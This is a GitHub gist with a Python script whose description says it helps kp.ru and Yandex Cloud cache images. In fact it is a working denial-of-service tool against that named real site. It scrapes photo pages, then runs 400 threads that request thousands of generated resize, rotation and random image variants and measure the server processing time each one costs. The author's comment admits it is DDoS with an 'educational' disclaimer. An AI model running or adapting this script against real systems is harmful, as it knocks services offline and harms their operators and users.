Skip to content

Instantly share code, notes, and snippets.

@AChep
Last active March 16, 2022 10:39
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save AChep/13f2503bbed356f0dafca8a13aaa5bd0 to your computer and use it in GitHub Desktop.
Save AChep/13f2503bbed356f0dafca8a13aaa5bd0 to your computer and use it in GitHub Desktop.
Helps kp.ru/yandex cloud image generation service to cache images
from bs4 import BeautifulSoup
import re
import threading
import requests
import random
import string
import time
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Stop-War': 'true',
}
def get_image_urls():
image_url_pattern = re.compile(r'\/wr-\d{1,}\.\w{1,}$')
while 1:
image_section_id = random.randint(1, 79108)
# load next image section
image_section_url = "https://www.kp.ru/photo/%d/" % image_section_id
try:
image_section_html = requests.get(
image_section_url, headers=headers).text
except requests.exceptions.RequestException as e:
continue
# find all of the image link in this page and
# store it for later use
image_section_soup = BeautifulSoup(image_section_html, 'html.parser')
# iterate over re-scalable images
for image_url in [str(img.get('data-content-src')) for img in image_section_soup.find_all('div')]:
if image_url_pattern.search(image_url) == None:
continue
yield image_url
def fetch_image_url(url):
r_start_time = time.time()
try:
r = requests.get(url, headers=headers, stream=True)
except requests.exceptions.RequestException as e:
return None
r_end_time = time.time()
r_dt = r_end_time - r_start_time
# Count how much time was wasted by the
# server to process the image.
wasted_time = 0
try:
wasted_time = float(
r.headers['x-envoy-upstream-service-time']) / 1000.0
except Exception as e:
pass
return (r_dt, wasted_time, r.status_code)
def attack_image_url(url):
def get_image_width(prefix):
return [
# common sizes
("common_%s-width" % prefix, ['%s-80' % prefix]),
("common_%s-width" % prefix, ['%s-100' % prefix]),
("common_%s-width" % prefix, ['%s-136' % prefix]),
("common_%s-width" % prefix, ['%s-200' % prefix]),
("common_%s-width" % prefix, ['%s-360' % prefix]),
("common_%s-width" % prefix, ['%s-420' % prefix]),
("common_%s-width" % prefix, ['%s-750' % prefix]),
("common_%s-width" % prefix, ['%s-767' % prefix]),
("common_%s-width" % prefix, ['%s-800' % prefix]),
("common_%s-width" % prefix, ['%s-960' % prefix]),
("common_%s-width" % prefix, ['%s-1280' % prefix]),
# random sizes
("random_%s-width" % prefix, [
'%s-%d' % (prefix, 1281 + i) for i in range(1000)
])
]
def get_image_height(prefix):
return [
# common sizes
("common_%s-height" % prefix, ['%s-100' % prefix]),
("common_%s-height" % prefix, ['%s-360' % prefix]),
("common_%s-height" % prefix, ['%s-960' % prefix]),
("common_%s-height" % prefix, ['%s-1280' % prefix]),
# random sizes
("random_%s-height" % prefix, [
'%s-%d' % (prefix, 1281 + i) for i in range(1000)
])
]
# All of the image formats that are supported by the
# server.
formats = [
'png',
'jpg',
'webp',
]
name_groups = []
name_groups.extend(get_image_width("wr"))
name_groups.extend(get_image_width("w"))
name_groups.extend(get_image_height("hr"))
name_groups.extend([
# common rotations
("common_rot", [
'ro',
'ro-90',
'ro-270',
'ro-180'
]),
# all rotations
("random_rot", ['ro-%d' % (1 + i) for i in range(1080)]),
# random names
("random_names", [
''.join(
random.choices(string.ascii_uppercase + string.digits, k=10)
) for i in range(1000)
]),
])
for format in formats:
for group, names in name_groups:
for name in names:
file = name + "." + format
target_url = requests.compat.urljoin(url, file)
# request the given image
r = fetch_image_url(target_url)
if r is None or r[2] == 404:
print('Got 404 for "%s".' %
(target_url))
break
print('Got %d for "%s" in %ds., wasted %fs.' %
(r[2], target_url, r[0], r[1]))
if r[1] < 0.1 and r[2] == 200: # wasted less than 0.1s
break
return None
image_urls = []
def produce_image_urls():
for url in get_image_urls():
while len(image_urls) > 300:
time.sleep(0.1)
image_urls.append(url)
def consume_image_urls():
while 1:
while len(image_urls):
try:
url = image_urls.pop()
except IndexError as e:
continue
attack_image_url(url)
time.sleep(0.1)
for _ in range(1):
t = threading.Thread(target=produce_image_urls, args=[])
t.start()
for _ in range(400):
t = threading.Thread(target=consume_image_urls, args=[])
t.start()
@AChep
Copy link
Author

AChep commented Mar 5, 2022

DISCLAIMER: (D)DOS'ing is illegal! Usage of this script is intended for educational and testing purposes only!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment